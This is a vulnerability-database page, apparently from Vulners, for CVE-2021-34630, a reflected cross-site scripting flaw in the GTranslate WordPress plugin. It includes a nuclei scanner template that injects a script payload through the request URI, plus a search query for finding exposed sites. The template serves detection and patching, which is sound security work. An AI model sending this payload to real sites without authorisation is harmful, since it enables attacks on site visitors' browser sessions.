Lucene search
K

GTranslate < 2.8.65 - Cross-Site Scripting

🗓️ 14 Jul 2026 07:07:24Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Vulnerability in GTranslate below version 2.8.65 allows reflected XSS attacks from certain browsers.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-34630
23 Jul 202115:18
attackerkb
Circl
CVE-2021-34630
2 Dec 202411:23
circl
CNNVD
WordPress 插件代码注入漏洞
30 Jul 202100:00
cnnvd
CVE
CVE-2021-34630
30 Jul 202120:45
cve
Cvelist
CVE-2021-34630 Reflected XSS in GTranslate Pro and GTranslate Enterprise < 2.8.65
30 Jul 202120:45
cvelist
EUVD
EUVD-2021-21280
7 Oct 202500:30
euvd
NVD
CVE-2021-34630
30 Jul 202121:15
nvd
OSV
CVE-2021-34630
30 Jul 202121:15
osv
Patchstack
WordPress GTranslate plugin <= 2.8.64 – Reflected Cross-Site Scripting (XSS) vulnerability
23 Jul 202100:00
patchstack
Prion
Cross site scripting
30 Jul 202121:15
prion
Rows per page
id: CVE-2021-34630

info:
  name: GTranslate < 2.8.65 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    In the Pro and Enterprise versions of GTranslate < 2.8.65, the gtranslate_request_uri_var function runs at the top of all pages and echoes out the contents of $_SERVER['REQUEST_URI']. Although this uses addslashes, and most modern browsers automatically URLencode requests, this plugin is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below, or in cases where an attacker is able to modify the request en route between the client and the server, or in cases where the user is using an atypical browsing solution.
  impact: |
    Allows attackers to execute malicious scripts in the context of a user's browser session
  remediation: |
    Update GTranslate Plugin to the latest version to mitigate this issue.
  reference:
    - https://wpscan.com/vulnerability/dfac81bb-7807-4288-aee3-43c7653c6446/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34630
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-34630
    cwe-id: CWE-79
    epss-score: 0.01572
    epss-percentile: 0.72529
    cpe: cpe:2.3:a:gtranslate:gtranslate:*:*:*:*:enterprise:wordpress:*:*
  metadata:
    verifiedl: true
    max-request: 1
    vendor: gtranslate
    product: gtranslate
    framework: wordpress
    fofa-query: body="/wp-content/plugins/gtranslate"
  tags: cve,cve2021,wordpress,wp,wp-plugin,gtranslate,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?page</script><script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'
          - 'gtranslate'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b0bd34db532c12e297622d7f0910f00954f06101787f694bf1d6570c94f8b413022022f601c29ed94cfe6de092c004d174f990e1ce11bc6b7d7e10f3596c6c9e972d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.15 - 6.1
EPSS0.01572
19